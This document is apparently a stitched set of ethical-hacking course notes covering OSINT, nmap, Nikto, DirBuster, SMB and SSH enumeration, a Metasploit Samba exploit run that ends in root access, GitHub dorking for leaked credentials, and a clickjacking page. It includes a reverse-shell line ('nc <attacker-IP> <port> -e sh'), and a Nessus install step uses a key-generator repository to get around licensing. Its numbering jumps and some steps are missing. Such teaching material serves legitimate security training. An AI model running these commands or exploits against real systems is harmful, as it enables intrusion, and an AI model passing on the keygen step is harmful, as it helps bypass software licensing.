These can provide access to:
• Profile information
• Post and update history
• Engagement metrics (likes, comments, shares)
• Network and connection data
4. Sentiment Analysis and Opinion Mining
Sentiment analysis and opinion mining involve using algorithms to analyze the tone and sentiment
of social media posts about an individual. This can help identify:
• Positive and negative opinions about the person
• Trends and patterns in public perception
• Potential areas of concern or controversy
5. Contextual Analysis
Contextual analysis involves examining the broader context in which social media conversations
about an individual take place. This can include:
• Identifying influencers and key opinion leaders
• Analyzing the role of hashtags and keywords
• Understanding the impact of events and news on public perception
Ethical Considerations
When gathering information about an individual through social media, it’s essential to consider
ethical implications, such as:
• Respect for privacy and personal boundaries
• Avoiding harassment or targeted attacks
• Ensuring data collection and analysis are transparent and compliant with platform terms and
regulations
Best Practices
To effectively utilize social media for information gathering on a person, follow these best practices:
• Clearly define the purpose and scope of the information gathering
• Use publicly available information and APIs whenever possible
• Respect privacy boundaries and avoid collecting sensitive or personal data
• Analyze and interpret data in a responsible and unbiased manner
By understanding these methods and best practices, you can effectively utilize social media for
information gathering on a person while maintaining ethical standards.
OSINT Fundamentals
Open-Source Intelligence (OSINT) refers to the collection, analysis, and dissemination of publicly
available information from various sources, including the internet, social media, news articles, and
other publicly accessible data. OSINT is a crucial component of intelligence gathering, as it provides
valuable insights and information without requiring access to classified or proprietary data.
Key Concepts:
1. Publicly Available Information (PAI): Information that is freely accessible and can be found
through online searches, news articles, and other publicly available sources.
2. Open-Source Intelligence (OSINT): The process of collecting, analyzing, and disseminating PAI
to support intelligence operations, decision-making, and situational awareness.
3. Information Quality: Evaluating the reliability and credibility of PAI to ensure accurate and
trustworthy insights.
OSINT Techniques:
1. Advanced Search Operators: Utilizing search engines to their full potential, including
advanced search operators and syntax (Google Dorking).
2. Social Media Analysis: Collecting and analyzing data from social media platforms to identify
trends, sentiment, and potential threats.
3. Web Scraping: Extracting data from websites and online sources using specialized tools and
techniques.
4. Historical Research: Gathering and analyzing historical information to identify patterns, trends,
and potential risks.
OSINT Tools:
1. Maltego: A popular OSINT tool for collecting and analyzing data from various sources, including
social media and the dark web.
2. Spiderfoot: A tool for automating OSINT tasks, including search engine queries and web
scraping.
3. Custom Python Tools: Utilizing Python programming language to create custom OSINT tools
and scripts.
Best Practices:
1. Curiosity and Passion: Developing a curiosity-driven approach to OSINT, with a passion for
continuous learning and improvement.
2. Ethical Considerations: Adhering to ethical guidelines when collecting and analyzing PAI,
ensuring responsible and respectful use of publicly available information.
3. Continuous Training: Staying up-to-date with the latest OSINT techniques, tools, and trends
through ongoing training and professional development.
Real-World Applications:
1. Cyber Threat Intelligence: Identifying and monitoring cyber threats, vulnerabilities, and
incident response efforts using OSINT.
• Importance of OSINT in Ethical Hacking: OSINT is a crucial step in the ethical hacking process,
as it allows hackers to gather information about a target without having to resort to more invasive or
malicious methods. By using OSINT, ethical hackers can identify potential vulnerabilities and
weaknesses, and then use that information to simulate an attack and test the target’s defenses.
• OSINT Techniques and Tools: There are a variety of OSINT techniques and tools available,
including Google Dorking, metadata analysis, and social media analysis. These tools and techniques
can be used to gather information about a target, including their IP address, domain name, and other
relevant details. Some popular OSINT tools include Maltego, Shodan, and TheHarvester.
• Ethical Considerations: When using OSINT for ethical hacking, it’s essential to consider the
ethical implications of gathering and analyzing information from publicly available sources. Ethical
hackers must ensure that they are not violating any laws or regulations, and that they are respecting
the privacy and security of the target organization or individual.
• Best Practices for OSINT in Ethical Hacking: To get the most out of OSINT in ethical hacking,
it’s essential to follow best practices, such as defining clear objectives, using automated tools, and
verifying the accuracy of the information gathered. Additionally, ethical hackers should stay up-to-
date with the latest OSINT tools and techniques, and be aware of the potential risks and limitations of
using OSINT in ethical hacking.
For More
https://www.youtube.com/watch?v=FS9j131Gq-M
Week 6
https://nmap.org/book/man-port-scanning-techniques.html
Support Group
"Mastering Nmap: Essential Commands for Network Scanning and Recon for Hacking"
1. Scan a single IP
>> nmap 192.168.1.1
Performs a simple scan on the specified IP address.
>> nmap --script http-title 192.168.1.1
Runs the http-title script to extract the title of a web page.
17. Netdiscover
>> netdiscover -i eth0 -r 192.168.1.0/24
Performs a ping scan (host discovery) on the local network 192.168.1.0/24. This subnet range
includes IP addresses from 192.168.1.0 to 192.168.1.255.
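The /24 range above, and the idea behind a basic TCP connect scan, can be sketched with only Python's standard library. The IPs and ports are illustrative; only probe hosts you are authorized to test:

```python
import ipaddress
import socket

def hosts_in(cidr):
    """List the usable host addresses in a CIDR range (what -r sweeps)."""
    return [str(h) for h in ipaddress.ip_network(cidr).hosts()]

def tcp_port_open(host, port, timeout=0.5):
    """Crude TCP connect check: the idea behind nmap's connect scan (-sT)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False

net = hosts_in("192.168.1.0/24")
print(len(net), net[0], net[-1])   # 254 192.168.1.1 192.168.1.254
```

Note that `.hosts()` excludes the network (.0) and broadcast (.255) addresses, which is why a /24 yields 254 scannable hosts.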
For more
https://www.youtube.com/playlist?list=PLOSJSv0hbPZAAeHUSEcq5lG6NkIqOGcb4
https://medium.com/@zisansakibhaque/network-scanning-101-c47c655f2d98
What can be done with insecure HTTP methods?
--> nmap -Pn -sV -p 80 -T4 --script http-methods --script-args http-methods.test=all bytecapsuleit.com
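Conceptually, the http-methods script asks the server which verbs it accepts and flags the dangerous ones. A minimal stand-in sketch, with a throwaway local server in place of a real target (the handler's advertised methods and the RISKY set are illustrative assumptions, not nmap internals):

```python
import http.client
import http.server
import threading

RISKY = {"PUT", "DELETE", "TRACE", "CONNECT"}

class Handler(http.server.BaseHTTPRequestHandler):
    # Deliberately advertises dangerous verbs, like a misconfigured server.
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", "GET, POST, PUT, DELETE, TRACE")
        self.end_headers()
    def log_message(self, *args):  # keep the demo quiet
        pass

def allowed_methods(host, port):
    """Ask the server which verbs it accepts via an OPTIONS request."""
    conn = http.client.HTTPConnection(host, port, timeout=2)
    conn.request("OPTIONS", "/")
    allow = conn.getresponse().getheader("Allow") or ""
    conn.close()
    return {m.strip() for m in allow.split(",") if m.strip()}

server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()
methods = allowed_methods("127.0.0.1", server.server_address[1])
print(sorted(methods & RISKY))   # ['DELETE', 'PUT', 'TRACE']
server.shutdown()
```

PUT and DELETE allow writing to or removing server resources, and TRACE enables cross-site tracing attacks, which is why these verbs are flagged.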
First, check the victim machine's IP address.
command
>> ip address
To find hidden files and directories
Let's check the /test/ Test page
Let's check the /phpMyAdmin/
We see the information. Now it's time to brute-force. Here we will use Nikto and DirBuster.
What is Nikto
Nikto is an open-source web server scanner and vulnerability assessment tool designed to identify
potential security issues in web servers and web applications. It performs comprehensive tests
against web servers, checking for:
1. Outdated software: Nikto checks for outdated versions of web server software, including HTTP
servers, web applications, and other related components.
2. Configuration errors: The tool examines server configuration files and settings for potential
mistakes or security vulnerabilities.
3. Vulnerable files and programs: Nikto scans for known vulnerable files and programs, such as CGI
scripts, PHP files, and other executable code.
4. Server misconfigurations: It checks for incorrect or missing server settings, like HTTP headers,
index files, and server options.
5. SSL/TLS issues: Nikto can also scan for SSL/TLS certificate-related security issues, including cipher
suite weaknesses and certificate expiration dates.
Nikto’s output includes a detailed report listing the identified issues, along with recommendations for
remediation. This information helps security professionals, system administrators, and penetration
testers to:
• Identify and prioritize security vulnerabilities
• Remediate issues to improve web server security
• Conduct thorough security assessments and audits
Nikto is a command-line interface (CLI) tool, available for Linux, Windows, and macOS platforms. Its
flexibility and customizability make it a popular choice among security professionals and web
developers.
The -h flag specifies the host: the target web server's IP address or hostname to be scanned by
Nikto.
command
>> nikto -h 192.168.231.152
What is dirbuster
DirBuster: A multi-threaded Java application designed to brute-force directory and file names on
web/application servers. Its primary goal is to find hidden files and directories on web servers, which
are often overlooked in default installations.
1. List-based brute force: DirBuster comes with 9 pre-generated lists of common directory and file
names, crawled from the internet and compiled based on actual usage by developers. This approach
makes it effective at finding hidden files and directories.
2. Pure brute force: Additionally, DirBuster offers a pure brute-force option, allowing users to specify
a custom wordlist or perform a blind brute-force attack.
3. Options: Users can customize DirBuster’s behavior by specifying options such as:
• Target URL
• Wordlist (default or custom)
• GET or HEAD request method
• Thread count
• Start point of the scan
• Verbose output
• File extension filtering
• Recursive scanning
• Report file output
DirBuster is a powerful tool for web penetration testers and security researchers, helping them
discover hidden files and directories on web servers. Its effectiveness relies on the quality of its pre-
generated lists and the user’s ability to customize its behavior to suit their specific needs.
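The list-based brute force DirBuster performs can be sketched in a few lines. The local server, hidden paths, and tiny wordlist below are stand-ins for a real target and a real wordlist, not DirBuster's actual internals:

```python
import http.client
import http.server
import threading

class Handler(http.server.BaseHTTPRequestHandler):
    HIDDEN = {"/admin/", "/backup/"}   # paths that "exist" on this demo server
    def do_GET(self):
        self.send_response(200 if self.path in self.HIDDEN else 404)
        self.end_headers()
    def log_message(self, *args):
        pass

def brute_dirs(host, port, wordlist):
    """Request each candidate path; keep the ones that don't 404."""
    found = []
    for word in wordlist:
        conn = http.client.HTTPConnection(host, port, timeout=2)
        conn.request("GET", f"/{word}/")
        if conn.getresponse().status != 404:
            found.append(f"/{word}/")
        conn.close()
    return found

server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()
hits = brute_dirs("127.0.0.1", server.server_address[1],
                  ["admin", "test", "backup"])
print(hits)   # ['/admin/', '/backup/']
server.shutdown()
```

Real scanners add threading, HEAD requests, recursion, and smarter status-code handling, but the core loop is exactly this.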
To start DirBuster
>> dirbuster
Target Url
http://192.168.231.152:80/
Go to
• click on (Browse)
• from Look in select (/)
• then select (usr)
• then select (share)
• then find (wordlists)
• then select (dirbuster)
• then choose a wordlist as needed
Results - List View
27. EHP Enumerating SMB
Enumerating SMB
SMB stands for Server Message Block, a protocol used for sharing files, printers, and other resources
over a network. It's widely used in Windows environments but is also supported by other operating
systems like Linux and macOS.
1. File Sharing: Allows users to access, read, and write files on remote servers as if they were on the
local machine.
2. Printer Sharing: Allows shared printers to be accessed and used over the network.
3. Network Browsing: Provides the ability to discover and access resources available on a network.
4. Authentication and Permissions: Ensures secure access by requiring users to authenticate and
restricting access based on permissions.
Common Uses:
SMB Versions:
1. SMB 1.0: The original version, now outdated and considered insecure.
2. SMB 2.0: Introduced in Windows Vista and Server 2008, offering improved performance and
security.
3. SMB 3.0 and newer: Enhanced with encryption, performance improvements, and failover support.
Common in modern Windows systems.
Metasploit framework
Metasploit is a powerful open-source penetration testing framework used to discover, exploit, and
validate vulnerabilities in systems. It provides tools for creating and executing exploit code, as well
as for simulating real-world attacks to test system security.
Key Features:
• Exploitation: Helps find and exploit vulnerabilities in networks and applications.
• Payloads: Delivers scripts (like Meterpreter) to interact with or control compromised systems.
• Modules: Includes exploits, auxiliary tools (e.g., for scanning), and post-exploitation tools.
• Automation: Enables scripting and repeatable testing processes.
• Community Contributions: Regularly updated with new exploits and features.
Metasploit is popular among ethical hackers, security researchers, and even malicious actors,
making it essential to learn for cybersecurity professionals.
>> msfconsole
Now in msfconsole
We need a scanning module. Searching shows:
224 auxiliary/scanner/smb/smb_ms17_010
Now select auxiliary/scanner/smb/smb_ms17_010, which is entry number 224 in the search results:
>> use 224
To check what options it takes:
>> show options
Now set RHOSTS (the remote host) and run the module:
>> set RHOSTS <target-IP>
>> run
Now try smbclient to look for accessible shares and weaknesses.
To start smbclient against the host and list its shares:
>> smbclient -L <target-IP>
Here we will use the IPC$ share (any other listed share could also be chosen):
>> smbclient //<target-IP>/IPC$
28. EHP Enumerating SSH
Enumerating SSH
Secure Shell (SSH) is a cryptographic network protocol that enables secure remote access to and
management of computers, servers, and other network devices over an unsecured network. It
provides a secure connection by encrypting data and authenticating users, ensuring the
confidentiality and integrity of transmitted data.
Key Features:
• Encryption: SSH encrypts all data transmitted between the client and server, making it difficult
for unauthorized parties to intercept and read or modify the data.
• Port forwarding: SSH allows for tunneling or port forwarding, enabling data packets to traverse
networks that would otherwise block them.
• Secure remote access: SSH enables administrators to access and manage remote devices,
servers, and networks securely, without exposing sensitive data to unauthorized parties.
Common Uses:
Port Number: SSH typically uses port 22, but this can be changed during configuration.
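Before reaching for Metasploit, the SSH version can often be read straight off the wire: per RFC 4253, servers announce an identification string as soon as a client connects. A minimal banner grab, with a fake local server standing in for a real target (the banner text is an illustrative example):

```python
import socket
import threading

def grab_ssh_banner(host, port, timeout=2.0):
    """Read the SSH identification string ('SSH-<proto>-<software>')."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(255).decode("ascii", "replace").strip()

# Stand-in server advertising a banner, so the sketch is self-contained.
def fake_sshd(server_sock):
    conn, _ = server_sock.accept()
    conn.sendall(b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\r\n")
    conn.close()

srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
threading.Thread(target=fake_sshd, args=(srv,), daemon=True).start()
banner = grab_ssh_banner("127.0.0.1", srv.getsockname()[1])
print(banner)   # SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
srv.close()
```

The software part of the banner (here an OpenSSH version) is exactly what version-scanner modules record and match against known vulnerabilities.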
Enumerating SSH
>> msfconsole
In Metasploit, search for SSH modules:
>> search ssh
Now select module number 15 from the results and check it:
>> use 15
>> show options
Here RHOSTS is not set; RPORT is already set to 22.
Now run the module to see what information we get:
>> run
Video time 05:53
Week 07
30. EHP Scanning with Nessus Part 1
Step-1
Install Nessus:
>> dpkg -i Nessus-10.8.3-debian10_amd64.deb
Step-2
Go to for more info
https://github.com/harshdhamaniya/nessuskeygen
Step-3
Stop Nessus:
>> systemctl stop nessusd
>> cd nessuskeygen
Copy the activation code and use it. (It will be valid for 5 days.)
Step-4
Updating the Nessus Key
To update the Nessus key, you can use the following commands:
>> nessuscli fix --reset-all (no need to run this command the first time)
>> /opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx
Step-5
Start Nessus:
>> systemctl start nessusd
31. EHP Scanning with Nessus Part 2
A reverse shell, or connect-back shell, is a setup where the attacker first starts a listener on their
machine, while the target machine acts as a client that connects back to the attacker's listener.
After a successful connection, the attacker gains access to the shell of the target computer.
To launch a reverse shell, the attacker doesn’t need to know the IP address of the victim to access
the target computer.
Bind Shell
A bind shell is a setup where a remote console is established with another computer over the
network. In a bind shell, the attacker launches a service on the target computer, to which the attacker
can then connect and execute commands on the target computer. To launch a bind shell, the attacker
must know the IP address of the victim to access the target computer.
https://notes.anggipradana.com/tutorial/bind-vs-reverse-shell-concept
https://learntheshell.com/posts/bind-shells/
https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/
Key Takeaways:
• Reverse Shells are generally more stealthy and reliable for bypassing firewalls but require the
attacker to be ready and listening.
• Bind Shells are simpler but expose the target and depend on open inbound traffic, which is often
restricted by firewalls.
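The difference is purely the direction of the TCP connection. A benign sketch that only passes a string (no shell is attached) shows the reverse-shell direction: the attacker listens, the target connects out:

```python
import socket
import threading

# Reverse-shell *direction* demo: the "attacker" listens, the "target"
# connects back. Real payloads attach a shell; here we only send a string.

def attacker_listener(server_sock, results):
    conn, _ = server_sock.accept()          # wait for the call-back
    results.append(conn.recv(64).decode())
    conn.close()

listener = socket.socket()
listener.bind(("127.0.0.1", 0))             # like: nc -lvp <port>
listener.listen(1)
got = []
t = threading.Thread(target=attacker_listener, args=(listener, got))
t.start()

# "Target" side: an outbound connection, like nc <attacker-IP> <port> -e sh
with socket.create_connection(("127.0.0.1",
                               listener.getsockname()[1])) as c:
    c.sendall(b"shell would attach here")
t.join()
listener.close()
print(got[0])   # shell would attach here
```

A bind shell simply swaps the roles: the listening socket lives on the target, and the attacker initiates the connection.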
Reverse Shell at a glance:
• Use cases: preferred when the target is behind a NAT or firewall, or on a private network, making
direct inbound connections to the target impossible.
• Setup: the attacker runs a listener on their machine (e.g., nc -lvp <port>), and the target is
instructed to connect back (e.g., nc <attacker-IP> <port> -e sh).
• Target exposure: minimal, as the target does not leave an open port accessible to anyone; the
connection is outbound to a specific attacker.
Staged Payloads: A small stager is delivered first, which then downloads and executes the larger
main payload.
Non-Staged Payloads: A payload that contains everything needed to establish a connection and
gain control, all in one package.
Comparison between Staged and Non-Staged payloads used in penetration testing, especially with
tools like Metasploit:
Staged Payload at a glance:
• Reliability: less reliable if the network connection is interrupted during second-stage delivery.
• Examples: Meterpreter staged payload (windows/meterpreter/reverse_tcp); shell staged payload.
• Resource efficiency: can be more efficient, especially on constrained links, due to the smaller
initial stage.
• Use cases: ideal for advanced attacks requiring flexibility.
Examples in Metasploit
Staged Payload:
Example: windows/meterpreter/reverse_tcp
Process:
1. A small stager is delivered to the target and executed.
2. The stager establishes a connection back to the attacker and downloads the larger stage (e.g.,
Meterpreter).
Non-Staged Payload:
Example: windows/meterpreter_reverse_tcp
Process:
The entire payload, including the reverse shell or Meterpreter, is sent at once and executed.
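Metasploit encodes this distinction in the payload path itself, as the two examples above show: a `/` between payload type and transport means staged, an `_` means non-staged. A rough heuristic capturing that convention (an illustrative sketch, not Metasploit's own logic):

```python
# Metasploit naming convention: windows/meterpreter/reverse_tcp is staged,
# windows/meterpreter_reverse_tcp is non-staged (type fused to transport).

def is_staged(payload_path):
    """Heuristic: staged payloads keep the transport as its own
    path segment; non-staged names fuse type and transport with '_'."""
    last = payload_path.rsplit("/", 1)[-1]
    return not last.startswith(("meterpreter_", "shell_"))

print(is_staged("windows/meterpreter/reverse_tcp"))    # True  (staged)
print(is_staged("windows/meterpreter_reverse_tcp"))    # False (non-staged)
```

Reading the payload name this way tells you before launch whether a second-stage download will occur.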
Here we will target Samba (ports 139 and 445).
Now search for a Samba exploit on searchsploit. Here we are working with Samba 3.0 on a Linux
(Unix) system.
Now go to Metasploit Framework and search for
>> msfconsole
We found an exploit, 'Username map script', for Samba 3.0.
Now select it.
Now check options
Now exploit
We got root access
Manual Exploitation
https://github.com/danielmiessler/SecLists
USER_FILE => /usr/share/seclists/Usernames/
Week 08
38. EHP Web Application Testing Methodology
Recon
Enumeration
Vulnerability Scanning
Now Let’s Start to find out the Bugs in our Target Website
Step 01 —
Footprinting Website
First of all, we will footprint the target website using some well-known methods and techniques.
2. Finding out the X-Ray Vision for my Target Website [ Recommending https://web-check.as93.net/ ]
3. Finding the Geographical Location of the Target [ Tools — Google Earth, Google Maps, Wikimapia ]
4. Gathering information from Financial Services [ Tools — Google Finance, MSN Money, Yahoo!
Finance ]
6. Monitoring Target using Alerts [ Tools — Google Alerts, Twitter Alerts, Giga Alerts ]
7. Tracking the Online Reputation of the Target [ Tools — Mention, ReviewPush, Reputology ]
10. Footprinting through Social Networking Sites. [ Facebook, Twitter, Linkedin etc ]
11. Collecting Information through Social Engineering [ Collect information about users' and
employees' interests, cookies, and sensitive information ]
12. Analyze the Directory Structure of the Target Website [ Tools — Httrack ]
13. Find out the Archive and Analyze previous data [ Tools — ViewDns, https://web.archive.org ]
14. Extracting Meta Data of the Public Documents [ Tools — ExifTool, Web Data Extractor, Metagoofil ]
Step 02 —
Now Let’s Recon our Target Website through some Browser Addons !!
1. Finding the Technology which are used to build our Target Website [ Tools — Wappalyzer,
BuiltWith ]
2. Detect the use of JavaScript libraries with known vulnerabilities [ Tools — Retire.js ]
3. Gather Information of Ports, Services and Server and Common Vulnerabilities [ Tools — Shodan ]
Step 03—
Google Dorking
Online Resource:
– https://github.com/chr3st5an/Google-Dorking
— https://www.stationx.net/how-to-google-dork-a-specific-website/
Step 04 —
Github Dorking
• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns
- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”
https://github.com/random-robbie/keywords/blob/master/keywords.txt
https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
https://medium.com/hackernoon/developers-are-unknowingly-posting-their-credentials-online-
caa7626a6f84
https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f
Step 05—
Port Scanning
Now Let’s Scan the Ports of our Target Website through some necessary tools so that we can find out
the way of Attacking !! Haha..
1. Nmap [ https://www.stationx.net/nmap-cheat-sheet/ ]
2. UnicornScan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
3. Angry IP Scan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
4. Netcat [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
Notable encrypted and peer-to-peer ports:
• 6500: GameSpy Arcade
• 8080: HTTP proxy
• 27015: Half-Life
Step 06 —
Finding DNS Information
1. Dig [ https://sid4hack.medium.com/decoding-dns-penetration-testers-journey-with-
dig-7cb9845e6215 ]
2. DNS Lookup
3. MxToolbox
4. Nslookup
5. Viewdns
DNS footprinting helps in determining records about the target's DNS, such as A, MX, NS, CNAME,
SOA, SRV, PTR, and TXT records.
Step 07 —
Whois Lookup
Find out the Domain’s Information by using Whois Lookup. Link — https://www.whois.com/whois/
Step 08—
WAF Identification
In this step we need to identify whether our target website is protected by a WAF or not. We can use
two different tools for the same task:
Wafw00f [ https://github.com/EnableSecurity/wafw00f ]
WhatWaf [ https://github.com/Ekultek/WhatWaf ]
Step 09 —
Shodan Dorking
Shodan is a search engine for Internet-connected devices. It is different from search engines like
Google and Bing, because Google and Bing are great for finding websites, but Shodan helps in finding
different things: popular versions of Microsoft IIS, control servers for malware, how many hosts are
affected by new CVEs, which countries are becoming more connected, SSL certificates of
websites, etc.
Step 10 —
Check Security Header Info
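A sketch of what this step checks: compare a response's headers against the security headers that are commonly expected on modern sites. The EXPECTED list and the sample response headers are illustrative:

```python
# Common security headers a hardened site is expected to send; a missing
# entry is a finding worth noting in the report.
EXPECTED = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
]

def missing_security_headers(headers):
    """Return the expected headers absent from a response (case-insensitive)."""
    present = {k.lower() for k in headers}
    return [h for h in EXPECTED if h.lower() not in present]

# Sample response headers from a hypothetical target:
sample = {"Content-Type": "text/html", "X-Frame-Options": "DENY"}
print(missing_security_headers(sample))
```

In practice the `headers` dict would come from an HTTP client's response object rather than a hard-coded sample.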
Step 11 —
Subdomain Enumeration
Let’s discuss the top 10 subdomain search tools that can help you discover subdomains.
1. Sublist3r [ Python tool that leverages multiple search engines to enumerate subdomains for a
given domain. ]
2. Amass [ Open-source tool for passive reconnaissance that discovers subdomains, IP addresses,
and other related information. ]
3. Subfinder [ Subdomain discovery tool that uses multiple sources, including search engines and
certificate transparency logs. ]
4. Censys [ A search engine that provides access to a large and up-to-date database of internet
hosts, including subdomains. ]
5. Assetnote [ A tool for asset discovery and monitoring, helping with subdomain identification and
tracking changes over time. ]
8. Knockpy [ Python tool that uses multiple sources to gather subdomain information for a target
domain. ]
9. DNSDumpster [ An online tool that provides DNS reconnaissance services, including subdomain
discovery. ]
10. Aquatone [ A tool that helps visualize and gather information about domains, including
subdomains, by combining techniques like screenshotting. ]
Step 12—
Filtering Live Domains
There is a tool called httpx, which is used to check whether subdomains are active or not; there are
multiple methods to use this tool. We will see the simple method only.
▶ Enumerate/Collect all subdomains using tools like subfinder, assetfinder, Knockpy and haktrails,
etc.
subfinder (https://www.youtube.com/watch?v=UT52zmdTMw0)
assetfinder (https://www.youtube.com/watch?v=YJ-nv758OSQ)
Knockpy (https://www.youtube.com/watch?v=FKhfZaYVO9I)
haktrails (https://www.youtube.com/watch?v=UT72WuKEQKM)
▶ Add all Enumerated/Collected subdomains from different tools in different files into one file with
unique subdomains, that may be subdomains.txt
▶ Run httpx against that file; you'll be able to see the active subdomains only, on which you can
start finding bugs.
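The merge-into-one-file step above can be sketched in a few lines of Python; the file names are illustrative:

```python
import pathlib

def merge_unique(out_path, *in_paths):
    """Union the per-tool subdomain lists, lower-cased, sorted, one per line."""
    seen = set()
    for p in in_paths:
        for line in pathlib.Path(p).read_text().splitlines():
            sub = line.strip().lower()
            if sub:
                seen.add(sub)
    pathlib.Path(out_path).write_text("\n".join(sorted(seen)) + "\n")
    return len(seen)

# Example with two tool outputs containing an overlap (note the case change):
pathlib.Path("subfinder.txt").write_text("a.example.com\nb.example.com\n")
pathlib.Path("assetfinder.txt").write_text("B.example.com\nc.example.com\n")
print(merge_unique("subdomains.txt", "subfinder.txt", "assetfinder.txt"))  # 3
```

The resulting subdomains.txt is then fed to httpx (or any probe) without wasting requests on duplicates.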
Step 13—
URL Extraction
Httpx
WaybackURLs
Step 14—
Content Discovery
Httpx
Gobuster
Dirbuster
Step 15—
Finding Parameters
We are going to enumerate the web application to find hidden parameters of the target website, using:
Arjun Tool
ParamSpider
WaybackURL
Step 16—
Sorting URLs
GF tool is a powerful command-line utility that acts as a wrapper around the grep command,
providing additional functionality and convenience for searching and filtering text.
Link — https://github.com/tomnomnom/gf
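gf essentially wraps patterns like these. A plain-grep sketch over a small sample URL list (the URLs and parameter patterns are illustrative, not gf's bundled pattern files):

```shell
# Sort collected URLs by likely vulnerability class with plain grep,
# the idea that gf packages into reusable pattern files.
printf '%s\n' \
  'https://example.com/item?id=1' \
  'https://example.com/search?q=test' \
  'https://example.com/page?redirect=/home' > urls.txt

# Parameters often tested for SQL injection:
grep -E '[?&](id|uid|select)=' urls.txt

# Parameters often tested for open redirects:
grep -E '[?&](redirect|url|next)=' urls.txt
```

gf stores such regexes as named JSON patterns (e.g., `gf sqli < urls.txt`), so the same filters can be reused across engagements.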
Step 17—
Automation in Vulnerability Scanning
1. Nessus — Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.
2. Burpsuite — Burp Suite is an integrated platform/graphical tool for performing security testing of
web applications. Its various tools work seamlessly together to support the entire testing process,
from initial mapping and analysis of an application’s attack surface, through to finding and exploiting
security vulnerabilities.
3. ZAP — OWASP ZAP is a penetration testing tool that helps developers and security professionals
detect and find vulnerabilities in web applications.
4. Acunetix — Acunetix is an automated web application security testing tool that audits your web
applications by checking for vulnerabilities like SQL Injection, Cross-site scripting, and other
exploitable vulnerabilities.
Using Process — https://darkyolks.medium.com/vulnweb-lab-report-an-analysis-of-vulnerabilities-
on-the-web-c33472761913
5. SQLmap — SQLmap is an open-source penetration testing tool that automates the process of identifying and then exploiting SQL injection flaws, and subsequently taking control of the database servers. In addition, SQLmap comes with a detection engine that includes advanced features to support penetration testing.
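To see what sqlmap is automating, here is the core flaw in miniature: user input concatenated straight into a query string (the table and column names are hypothetical):

```shell
# Attacker-controlled input containing a classic tautology payload.
user_input="' OR '1'='1"

# Vulnerable pattern: the input is spliced into the SQL text unescaped.
query="SELECT * FROM users WHERE name = '${user_input}'"
echo "$query"
# The WHERE clause now reads: name = '' OR '1'='1' -- always true.
```

sqlmap probes for exactly this kind of behavior, then escalates to data extraction automatically.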
Step 18 —
Scan Vulnerabilities manually through the testing methods of OWASP Top
10 Vulnerabilities Category.
First of all, let's go over the categories and subcategories of the OWASP Top 10 vulnerabilities, because once you know what the bugs are, you can exploit them through your own testing methodology.
A01: Broken Access Control
• IDOR
• Directory or Path Traversal
• Function Injection
• Privilege Escalation
• Horizontal and Vertical Privilege Escalation
A03: Injection
• Os Command Injection
• SQL Injection
• Cross-Site Scripting (XSS)
• Expression Language Injection
• XML Injection
• LDAP Injection
• NoSQL Injection
• SSTI
A07: Identification and Authentication Failures
• Security-by-Obscurity
• Session Fixation
• Unintended Functionality
• Use of Hardcoded Credentials
• Weak Error Handling
• Brute-Force Attacks
• Credential Stuffing
• Credential Theft
• Session Hijacking
• Weak Password Policies
• Weak Session Cookies
• Lack of Multi-Factor Authentication (MFA)
• Insecure Session Management
• Insecure Authentication Protocols
• Insecure Password Storage
• User Enumeration
• Unvalidated Redirects and Forwards
• Unauthenticated SSRF
• Authenticated SSRF
Now you can test your target website with several techniques to find the vulnerabilities. It's recommended to follow writeups related to each vulnerability.
Step 19—
Analyze Vulnerability Databases.
4. Patchstack — https://patchstack.com/database/
Step 20—
Report Writing
Report Structure:
A security testing report should have a clear and logical structure. Here’s a recommended structure:
a. Introduction: Provide a brief overview of the security testing context, objectives, and report
scope.
b. Methodology: Describe the techniques and tools used to conduct the security testing.
c. Findings: Present the identified vulnerabilities in a clear and organized manner. Use categories
or severity levels to aid readability.
d. Evidence: Include screenshots, code snippets, or any other evidence to support your findings.
e. Conclusion: Summarize the key points of the report and thank the relevant parties.
It's also recommended to follow this guide — https://www.intigriti.com/hackademy/how-to-write-a-good-report
https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168
Step-10
Clickjacking
HTTP headers are an easy-to-implement boost to web security. Proper HTTP response headers can help prevent vulnerabilities like Cross-Site Scripting, Clickjacking, information disclosure, and more.
https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html
For testing purposes, find programs from the sites listed below.
1. HackerOne
https://hackerone.com/bug-bounty-programs
2. Bugcrowd
https://bugcrowd.com/engagements?
category=bug_bounty&page=1&sort_by=promoted&sort_direction=desc
3. Bugbase
https://bugbase.ai/programs
4. Intigriti
https://www.intigriti.com/researchers/bug-bounty-programs
To check security header information, we can use some of these websites:
1. https://securityheaders.com/
2. https://developer.mozilla.org/en-US/observatory
3. https://www.serpworx.com/check-security-headers/
4. https://domsignal.com/secure-header-test
ClickJack script
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<iframe src="https://example.com" width="500" height="500"></iframe>
</body>
</html>
